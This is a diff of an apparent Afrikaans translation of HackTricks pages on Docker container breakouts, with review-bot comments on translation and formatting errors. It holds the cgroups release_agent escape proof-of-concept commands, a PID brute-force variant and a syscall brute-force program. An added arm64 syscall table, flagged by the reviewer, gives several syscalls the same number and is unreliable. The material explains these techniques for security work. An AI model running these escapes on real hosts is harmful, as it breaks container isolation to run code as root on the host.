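Review bot: Two translations in the `@@ -473,89 +444,82 @@` hunk change the meaning. In the CVE-2019-5736 paragraph "overwrite" became `oorvleuel` (overlap); it must be "oorskryf", otherwise the sentence no longer says the host's /bin/sh is replaced. In the Docker Escape Surface list "(however its privileges are limited)" became `(tans beperkte voorregte)` ("currently limited privileges"); "(hoewel sy voorregte beperk is)" keeps the concession. Terminology in the same hunk is also inconsistent: "skul" in the nsenter hint is not a word (use "skulp", matching "skulpe" earlier); "host" is "gashouer" in the hostNetwork paragraph but "gasheer" everywhere else; "capabilities" is "bevoegdhede" in `+### Herstel bevoegdhede` but "vermoëns" and "MKNOD-vermoë" elsewhere; "payload" is rendered as "nut" (benefit), better kept as the technical term "payload"; and "root" in the link title `Metadata-diens MITM maak wortelvoorregverhoging moontlik` is the Unix user, not a plant root, so keep "root".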
@@ -579,9 +543,371 @@ There are other CVEs the container can be vulnerable too, you can find a list in 0x140 -- kexec_file_load 0x141 -- bpf ``` -{% endtab %} - {% tab title="arm64 syscalls" %} + +Hier is 'n lys van die mees gebruikte arm64-sistemaanroepe: + +| Sistemaanroep | Nommer | +| --- | --- | +| read | 63 | +| write | 64 | +| open | 1024 | +| close | 57 | +| stat | 106 | +| fstat | 80 | +| lstat | 107 | +| poll | 7 | +| lseek | 62 | +| mmap | 222 | +| mprotect | 226 | +| munmap | 215 | +| brk | 214 | +| rt_sigaction | 134 | +| rt_sigprocmask | 135 | +| rt_sigreturn | 139 | +| ioctl | 29 | +| pread64 | 67 | +| pwrite64 | 68 | +| readv | 65 | +| writev | 66 | +| access | 103 | +| pipe | 104 | +| select | 82 | +| sched_yield | 124 | +| mremap | 216 | +| msync | 227 | +| mincore | 232 | +| madvise | 233 | +| shmget | 215 | +| shmat | 216 | +| shmctl | 217 | +| dup | 23 | +| dup2 | 24 | +| pause | 29 | +| nanosleep | 101 | +| getitimer | 102 | +| alarm | 27 | +| setitimer | 103 | +| getpid | 20 | +| sendfile | 71 | +| socket | 97 | +| connect | 98 | +| accept | 99 | +| sendto | 101 | +| recvfrom | 102 | +| sendmsg | 103 | +| recvmsg | 104 | +| shutdown | 116 | +| bind | 99 | +| listen | 106 | +| getsockname | 32 | +| getpeername | 31 | +| socketpair | 135 | +| setsockopt | 105 | +| getsockopt | 118 | +| clone | 220 | +| fork | 57 | +| vfork | 58 | +| execve | 221 | +| exit | 93 | +| wait4 | 260 | +| kill | 129 | +| uname | 63 | +| semget | 221 | +| semop | 222 | +| semctl | 223 | +| shmdt | 224 | +| msgget | 225 | +| msgsnd | 226 | +| msgrcv | 227 | +| msgctl | 228 | +| fcntl | 25 | +| flock | 32 | +| fsync | 82 | +| fdatasync | 83 | +| truncate | 92 | +| ftruncate | 93 | +| getdents | 78 | +| getcwd | 79 | +| chdir | 80 | +| fchdir | 81 | +| rename | 128 | +| mkdir | 83 | +| rmdir | 84 | +| creat | 85 | +| link | 86 | +| unlink | 87 | +| symlink | 88 | +| readlink | 89 | +| chmod | 90 | +| fchmod | 91 | +| chown | 92 | +| fchown | 93 | +| lchown | 94 | +| umask 
| 95 | +| gettimeofday | 96 | +| getrlimit | 97 | +| getrusage | 98 | +| sysinfo | 99 | +| times | 100 | +| ptrace | 101 | +| getuid | 102 | +| syslog | 103 | +| getgid | 104 | +| setuid | 105 | +| setgid | 106 | +| geteuid | 107 | +| getegid | 108 | +| setpgid | 109 | +| getppid | 110 | +| getpgrp | 111 | +| setsid | 112 | +| setreuid | 113 | +| setregid | 114 | +| getgroups | 115 | +| setgroups | 116 | +| setresuid | 117 | +| getresuid | 118 | +| setresgid | 119 | +| getresgid | 120 | +| getpgid | 121 | +| setfsuid | 122 | +| setfsgid | 123 | +| getsid | 124 | +| capget | 125 | +| capset | 126 | +| rt_sigpending | 127 | +| rt_sigtimedwait | 128 | +| rt_sigqueueinfo | 129 | +| rt_sigsuspend | 130 | +| sigaltstack | 131 | +| utime | 132 | +| mknod | 133 | +| uselib | 134 | +| personality | 135 | +| ustat | 136 | +| statfs | 137 | +| fstatfs | 138 | +| sysfs | 139 | +| getpriority | 140 | +| setpriority | 141 | +| sched_setparam | 142 | +| sched_getparam | 143 | +| sched_setscheduler | 144 | +| sched_getscheduler | 145 | +| sched_get_priority_max | 146 | +| sched_get_priority_min | 147 | +| sched_rr_get_interval | 148 | +| mlock | 149 | +| munlock | 150 | +| mlockall | 151 | +| munlockall | 152 | +| vhangup | 153 | +| modify_ldt | 154 | +| pivot_root | 155 | +| _sysctl | 156 | +| prctl | 157 | +| arch_prctl | 158 | +| adjtimex | 159 | +| setrlimit | 160 | +| chroot | 161 | +| sync | 162 | +| acct | 163 | +| settimeofday | 164 | +| mount | 165 | +| umount2 | 166 | +| swapon | 167 | +| swapoff | 168 | +| reboot | 169 | +| sethostname | 170 | +| setdomainname | 171 | +| iopl | 172 | +| ioperm | 173 | +| create_module | 174 | +| init_module | 175 | +| delete_module | 176 | +| get_kernel_syms | 177 | +| query_module | 178 | +| quotactl | 179 | +| nfsservctl | 180 | +| getpmsg | 181 | +| putpmsg | 182 | +| afs_syscall | 183 | +| tuxcall | 184 | +| security | 185 | +| gettid | 186 | +| readahead | 187 | +| setxattr | 188 | +| lsetxattr | 189 | +| fsetxattr | 190 | +| 
getxattr | 191 | +| lgetxattr | 192 | +| fgetxattr | 193 | +| listxattr | 194 | +| llistxattr | 195 | +| flistxattr | 196 | +| removexattr | 197 | +| lremovexattr | 198 | +| fremovexattr | 199 | +| tkill | 200 | +| time | 201 | +| futex | 202 | +| sched_setaffinity | 203 | +| sched_getaffinity | 204 | +| set_thread_area | 205 | +| io_setup | 206 | +| io_destroy | 207 | +| io_getevents | 208 | +| io_submit | 209 | +| io_cancel | 210 | +| get_thread_area | 211 | +| lookup_dcookie | 212 | +| epoll_create | 213 | +| epoll_ctl_old | 214 | +| epoll_wait_old | 215 | +| remap_file_pages | 216 | +| getdents64 | 217 | +| set_tid_address | 218 | +| restart_syscall | 219 | +| semtimedop | 220 | +| fadvise64 | 221 | +| timer_create | 222 | +| timer_settime | 223 | +| timer_gettime | 224 | +| timer_getoverrun | 225 | +| timer_delete | 226 | +| clock_settime | 227 | +| clock_gettime | 228 | +| clock_getres | 229 | +| clock_nanosleep | 230 | +| exit_group | 231 | +| epoll_wait | 232 | +| epoll_ctl | 233 | +| tgkill | 234 | +| utimes | 235 | +| vserver | 236 | +| mbind | 237 | +| set_mempolicy | 238 | +| get_mempolicy | 239 | +| mq_open | 240 | +| mq_unlink | 241 | +| mq_timedsend | 242 | +| mq_timedreceive | 243 | +| mq_notify | 244 | +| mq_getsetattr | 245 | +| kexec_load | 246 | +| waitid | 247 | +| add_key | 248 | +| request_key | 249 | +| keyctl | 250 | +| ioprio_set | 251 | +| ioprio_get | 252 | +| inotify_init | 253 | +| inotify_add_watch | 254 | +| inotify_rm_watch | 255 | +| migrate_pages | 256 | +| openat | 257 | +| mkdirat | 258 | +| mknodat | 259 | +| fchownat | 260 | +| futimesat | 261 | +| newfstatat | 262 | +| unlinkat | 263 | +| renameat | 264 | +| linkat | 265 | +| symlinkat | 266 | +| readlinkat | 267 | +| fchmodat | 268 | +| faccessat | 269 | +| pselect6 | 270 | +| ppoll | 271 | +| unshare | 272 | +| set_robust_list | 273 | +| get_robust_list | 274 | +| splice | 275 | +| tee | 276 | +| sync_file_range | 277 | +| vmsplice | 278 | +| move_pages | 279 | +| utimensat 
| 280 | +| epoll_pwait | 281 | +| signalfd | 282 | +| timerfd_create | 283 | +| eventfd | 284 | +| fallocate | 285 | +| timerfd_settime | 286 | +| timerfd_gettime | 287 | +| accept4 | 288 | +| signalfd4 | 289 | +| eventfd2 | 290 | +| epoll_create1 | 291 | +| dup3 | 292 | +| pipe2 | 293 | +| inotify_init1 | 294 | +| preadv | 295 | +| pwritev | 296 | +| rt_tgsigqueueinfo | 297 | +| perf_event_open | 298 | +| recvmmsg | 299 | +| fanotify_init | 300 | +| fanotify_mark | 301 | +| prlimit64 | 302 | +| name_to_handle_at | 303 | +| open_by_handle_at | 304 | +| clock_adjtime | 305 | +| syncfs | 306 | +| sendmmsg | 307 | +| setns | 308 | +| getcpu | 309 | +| process_vm_readv | 310 | +| process_vm_writev | 311 | +| kcmp | 312 | +| finit_module | 313 | +| sched_setattr | 314 | +| sched_getattr | 315 | +| renameat2 | 316 | +| seccomp | 317 | +| getrandom | 318 | +| memfd_create | 319 | +| kexec_file_load | 320 | +| bpf | 321 | +| execveat | 322 | +| userfaultfd | 323 | +| membarrier | 324 | +| mlock2 | 325 | +| copy_file_range | 326 | +| preadv2 | 327 | +| pwritev2 | 328 | +| pkey_mprotect | 329 | +| pkey_alloc | 330 | +| pkey_free | 331 | +| statx | 332 | +| io_pgetevents | 333 | +| rseq | 334 | +| pidfd_send_signal | 424 | +| io_uring_setup | 425 | +| io_uring_enter | 426 | +| io_uring_register | 427 | +| open_tree | 428 | +| move_mount | 429 | +| fsopen | 430 | +| fsconfig | 431 | +| fsmount | 432 | +| fspick | 433 | +| pidfd_open | 434 | +| clone3 | 435 | +| close_range | 436 | +| openat2 | 437 | +| pidfd_getfd | 438 | +| faccessat2 | 439 | +| process_madvise | 440 | +| epoll_pwait2 | 441 | +| mount_setattr | 442 | +| landlock_create_ruleset | 444 | +| landlock_add_rule | 445 | +| landlock_restrict_self | 446 | + +{% endtab %} ``` 0x029 -- pivot_root 0x059 -- acct 
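Review bot: The `@@ -579,9 +543,371 @@` hunk adds material that is not a translation and leaves the GitBook tabs unbalanced: it removes the `{% endtab %}` that closed the x64 tab, opens `{% tab title="arm64 syscalls" %}`, inserts a several-hundred-row "mees gebruikte arm64-sistemaanroepe" table, and closes that tab with a new `{% endtab %}` before the original arm64 code block (`0x029 -- pivot_root ...`), which now sits outside any tab. The table cannot be a correct syscall table either: several numbers are assigned twice (read and uname both 63, ioctl and pause both 29, munmap and shmget both 215, mmap and semop both 222, bind and accept both 99), and it lists "most used" syscalls whereas the surrounding tabs list the syscalls the container root user cannot call. Drop the table and the added `{% tab %}`/`{% endtab %}` pair and restore the removed `{% endtab %}` so the hunk contains translation only.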
@@ -599,8 +925,6 @@ There are other CVEs the container can be vulnerable too, you can find a list in 0x111 -- finit_module 0x118 -- bpf ``` -{% endtab %} - {% tab title="syscall_bf.c" %} ````c // From a conversation I had with @arget131 @@ -613,31 +937,32 @@ There are other CVEs the container can be vulnerable too, you can find a list in int main() { - for(int i = 0; i < 333; ++i) - { - if(i == SYS_rt_sigreturn) continue; - if(i == SYS_select) continue; - if(i == SYS_pause) continue; - if(i == SYS_exit_group) continue; - if(i == SYS_exit) continue; - if(i == SYS_clone) continue; - if(i == SYS_fork) continue; - if(i == SYS_vfork) continue; - if(i == SYS_pselect6) continue; - if(i == SYS_ppoll) continue; - if(i == SYS_seccomp) continue; - if(i == SYS_vhangup) continue; - if(i == SYS_reboot) continue; - if(i == SYS_shutdown) continue; - if(i == SYS_msgrcv) continue; - printf("Probando: 0x%03x . . . ", i); fflush(stdout); - if((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM)) - printf("Error\n"); - else - printf("OK\n"); - } +for(int i = 0; i < 333; ++i) +{ +if(i == SYS_rt_sigreturn) continue; +if(i == SYS_select) continue; +if(i == SYS_pause) continue; +if(i == SYS_exit_group) continue; +if(i == SYS_exit) continue; +if(i == SYS_clone) continue; +if(i == SYS_fork) continue; +if(i == SYS_vfork) continue; +if(i == SYS_pselect6) continue; +if(i == SYS_ppoll) continue; +if(i == SYS_seccomp) continue; +if(i == SYS_vhangup) continue; +if(i == SYS_reboot) continue; +if(i == SYS_shutdown) continue; +if(i == SYS_msgrcv) continue; +printf("Probando: 0x%03x . . . ", i); fflush(stdout); +if((syscall(i, NULL, NULL, NULL, NULL, NULL, NULL) < 0) && (errno == EPERM)) +printf("Error\n"); +else +printf("OK\n"); +} } ``` + ```` {% endtab %} {% endtabs %} 
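Review bot: The `@@ -599,8 +925,6 @@` hunk removes the `{% endtab %}` that closed the arm64 tab after the `0x118 -- bpf` code block, so that block has no closing tab before `{% tab title="syscall_bf.c" %}` opens; restore the removed line (and its blank line) so every `{% tab %}` has a matching `{% endtab %}`.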
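Review bot: The `@@ -613,31 +937,32 @@` hunk strips all indentation from the body of `main()` in syscall_bf.c (every `for`, `if` and `printf` line is now flush left) and adds a stray blank line before the closing ```` fence, while translating nothing in the block (the `Probando:` string is still Spanish). Code inside fences should stay byte-for-byte as it was in a translation PR; revert the whitespace changes.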
@@ -647,12 +972,12 @@ int main() If you are in **userspace** (**no kernel exploit** involved) the way to find new escapes mainly involve the following actions (these templates usually require a container in privileged mode): * Find the **path of the containers filesystem** inside the host - * You can do this via **mount**, or via **brute-force PIDs** as explained in the second release\_agent exploit +* You can do this via **mount**, or via **brute-force PIDs** as explained in the second release\_agent exploit * Find some functionality where you can **indicate the path of a script to be executed by a host process (helper)** if something happens - * You should be able to **execute the trigger from inside the host** - * You need to know where the containers files are located inside the host to indicate a script you write inside the host +* You should be able to **execute the trigger from inside the host** +* You need to know where the containers files are located inside the host to indicate a script you write inside the host * Have **enough capabilities and disabled protections** to be able to abuse that functionality - * You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container +* You might need to **mount things** o perform **special privileged actions** you cannot do in a default docker container ## References diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md index 3f62c9116..ae95635a7 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md 
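Review bot: The `@@ -647,12 +972,12 @@` hunk removes the two-space indent from the sub-bullets (`-  * You can do this via **mount**` to `+* You can do this via **mount**`, and likewise for the other three), which flattens the nested list so each explanation is no longer under its parent step, and the paragraph and bullets in this hunk are still English, so the section is reformatted but not translated. Either translate the text and keep the original indentation, or leave this region out of the patch.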
@@ -1,24 +1,23 @@ -# Docker release\_agent cgroups escape +# Docker release_agent cgroups ontsnapping
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**For further details, refer to the [original blog post](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** This is just a summary: - -Original PoC: +**Vir verdere besonderhede, verwys na die [oorspronklike blogpos](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/).** Hierdie is net 'n opsomming: +Oorspronklike PoC: ```shell d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` mkdir -p $d/w;echo 1 >$d/w/notify_on_release 
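Review bot: In the `@@ -1,24 +1,23 @@` hunk the blank line between `Hierdie is net 'n opsomming:` and `+Oorspronklike PoC:` is dropped; a single newline is a soft break in Markdown, so "Oorspronklike PoC:" will render on the same line as the preceding sentence instead of as its own label above the code block. Keep the blank line (the English source has it).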
@@ -26,62 +25,50 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o ``` +Die bewys van konsep (PoC) demonstreer 'n metode om cgroups uit te buit deur 'n `release_agent` lêer te skep en sy aanroeping te veroorsaak om willekeurige opdragte op die houer-gashouer uit te voer. Hier is 'n ontleding van die stappe wat betrokke is: -The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved: - -1. **Prepare the Environment:** - - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup. - - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative. - +1. **Berei die omgewing voor:** +- 'n Gids `/tmp/cgrp` word geskep om as 'n koppelvlakpunt vir die cgroup te dien. +- Die RDMA cgroup-beheerder word aan hierdie gids gekoppel. In die geval van die afwesigheid van die RDMA-beheerder, word dit voorgestel om die `memory` cgroup-beheerder as 'n alternatief te gebruik. ```shell mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x ``` - -2. **Set Up the Child Cgroup:** - - A child cgroup named "x" is created within the mounted cgroup directory. - - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file. - +2. **Stel die Kind Cgroup op:** +- 'n Kind Cgroup genaamd "x" word binne die gemonteerde cgroup-gids geskep. +- Kennisgewings word geaktiveer vir die "x" cgroup deur 1 na sy notify_on_release-lêer te skryf. ```shell echo 1 > /tmp/cgrp/x/notify_on_release ``` - -3. **Configure the Release Agent:** - - The path of the container on the host is obtained from the /etc/mtab file. 
- - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path. - +3. **Stel die Vrylatingsagent in:** +- Die pad van die houer op die gasheer word verkry uit die /etc/mtab-lêer. +- Die release_agent-lêer van die cgroup word dan ingestel om 'n skripsie genaamd /cmd uit te voer wat geleë is op die verkryde gasheerpad. ```shell host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent ``` - -4. **Create and Configure the /cmd Script:** - - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified. - +4. **Skep en konfigureer die /cmd-skrip:** +- Die /cmd-skrip word binne die houer geskep en gekonfigureer om ps aux uit te voer, waar die uitset na 'n lêernaam /output in die houer omgelei word. Die volledige pad van /output op die gasheer word gespesifiseer. ```shell echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" >> /cmd chmod a+x /cmd ``` - -5. **Trigger the Attack:** - - A process is initiated within the "x" child cgroup and is immediately terminated. - - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container. - +5. **Trigger die Aanval:** +- 'n Proses word geïnisieer binne die "x" kind cgroup en word onmiddellik beëindig. +- Dit trigger die `release_agent` (die /cmd skrip), wat ps aux op die gasheer uitvoer en die uitset na /output binne die houer skryf. ```shell sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
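Review bot: In the `@@ -26,62 +25,50 @@` hunk the sub-bullets under each numbered step lose their three-space indent (`-   - A directory` becomes `+- 'n Gids ...`, and the same for steps 2 to 5), so they are no longer children of `1.` to `5.` and each step is cut off from its explanation; with the blank lines also removed, the fenced code blocks and the next numbered item run straight into the bullets. Restore the original indentation and blank lines. Wording in the same hunk: "koppelvlakpunt" means an interface point, the mount point is "monteerpunt"; "skripsie" (a thesis) in step 3 should be "skrip" as in step 4; "Kind Cgroup" should be lower case; and "Trigger die Aanval" / "Dit trigger" leave "trigger" untranslated while the opening paragraph of the hunk uses "veroorsaak" for the same idea.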
diff --git a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md index 5861740c2..15fa96bff 100644 --- a/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md +++ b/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md @@ -1,42 +1,39 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-For further details **check the blog port from [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. This is just a summary: +Vir verdere besonderhede **kyk na die blogpos van [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html)**. Hier is net 'n opsomming: -The technique outlines a method for **executing host code from within a container**, overcoming challenges posed by storage-driver configurations that obscure the container's filesystem path on the host, like Kata Containers or specific `devicemapper` settings. +Die tegniek beskryf 'n metode vir **die uitvoering van gasheerkode van binne 'n houer**, wat uitdagings oorkom wat deur stoorbestuurder-konfigurasies veroorsaak word wat die houer se lêernaampad op die gasheer verduister, soos Kata Containers of spesifieke `devicemapper`-instellings. -Key steps: +Kernstappe: -1. **Locating Process IDs (PIDs):** Using the `/proc//root` symbolic link in the Linux pseudo-filesystem, any file within the container can be accessed relative to the host's filesystem. This bypasses the need to know the container's filesystem path on the host. -2. **PID Bashing:** A brute force approach is employed to search through PIDs on the host. This is done by sequentially checking for the presence of a specific file at `/proc//root/`. When the file is found, it indicates that the corresponding PID belongs to a process running inside the target container. -3. **Triggering Execution:** The guessed PID path is written to the `cgroups release_agent` file. This action triggers the execution of the `release_agent`. The success of this step is confirmed by checking for the creation of an output file. +1. 
**Vind proses-ID's (PIDs):** Deur die `/proc//root` simboliese skakel in die Linux-pseudobestandstelsel te gebruik, kan enige lêer binne die houer relatief tot die gasheer se lêernaampad benader word. Dit vermy die behoefte om die houer se lêernaampad op die gasheer te ken. +2. **PID Bashing:** 'n Brute force-benadering word gebruik om deur PIDs op die gasheer te soek. Dit word gedoen deur sekwestraties te kontroleer vir die teenwoordigheid van 'n spesifieke lêer by `/proc//root/`. Wanneer die lêer gevind word, dui dit daarop dat die ooreenstemmende PID behoort aan 'n proses wat binne die teikenhouer loop. +3. **Uitvoering teweegbring:** Die geradeerde PID-pad word geskryf na die `cgroups release_agent`-lêer. Hierdie aksie teweegbring die uitvoering van die `release_agent`. Die sukses van hierdie stap word bevestig deur te kontroleer of 'n uitvoerlêer geskep is. -### Exploitation Process +### Uitbuitingsproses -The exploitation process involves a more detailed set of actions, aiming to execute a payload on the host by guessing the correct PID of a process running inside the container. Here's how it unfolds: +Die uitbuitingsproses behels 'n meer gedetailleerde stel aksies, met die doel om 'n nutslading op die gasheer uit te voer deur die korrekte PID van 'n proses wat binne die houer loop, te raai. So verloop dit: -1. **Initialize Environment:** A payload script (`payload.sh`) is prepared on the host, and a unique directory is created for cgroup manipulation. -2. **Prepare Payload:** The payload script, which contains the commands to be executed on the host, is written and made executable. -3. **Set Up Cgroup:** The cgroup is mounted and configured. The `notify_on_release` flag is set to ensure that the payload executes when the cgroup is released. -4. **Brute Force PID:** A loop iterates through potential PIDs, writing each guessed PID to the `release_agent` file. This effectively sets the payload script as the `release_agent`. -5. 
**Trigger and Check Execution:** For each PID, the cgroup's `cgroup.procs` is written to, triggering the execution of the `release_agent` if the PID is correct. The loop continues until the output of the payload script is found, indicating successful execution. +1. **Inisialiseer omgewing:** 'n Nutsladingskripsie (`payload.sh`) word op die gasheer voorberei, en 'n unieke gids word geskep vir cgroup-manipulasie. +2. **Berei nutslading voor:** Die nutsladingskripsie, wat die opdragte bevat wat op die gasheer uitgevoer moet word, word geskryf en uitvoerbaar gemaak. +3. **Stel Cgroup op:** Die cgroup word gemoniteer en gekonfigureer. Die `notify_on_release`-vlag word ingestel om te verseker dat die nutslading uitgevoer word wanneer die cgroup vrygestel word. +4. **Brute Force PID:** 'n Lus itereer deur potensiële PIDs en skryf elke geradeerde PID na die `release_agent`-lêer. Dit stel effektief die nutsladingskripsie as die `release_agent`. +5. **Teweegbring en Kontroleer Uitvoering:** Vir elke PID word die `cgroup.procs` van die cgroup geskryf, wat die uitvoering van die `release_agent` teweegbring as die PID korrek is. Die lus gaan voort totdat die uitvoer van die nutsladingskripsie gevind word, wat suksesvolle uitvoering aandui. -PoC from the blog post: - +PoC van die blogpos: ```bash #!/bin/sh 
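Review bot: two mistranslations in this hunk change the meaning of the procedure: in exploitation step 3, `Die cgroup word gemoniteer en gekonfigureer` says the cgroup is monitored, where the source says mounted (`gemonteer`), and in key step 2 `sekwestraties` is not a word; `opeenvolgend` (sequentially) is intended. `geradeerde PID` (used twice, in key step 3 and exploitation step 4) should be `geraaide PID`; `geradeer` does not mean guessed. The empty PID component in `/proc//root` appears on both the `-` and `+` sides, so it is a pre-existing artefact of the source file rather than something this hunk introduces, but it is worth confirming the placeholder survives in the rendered page.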
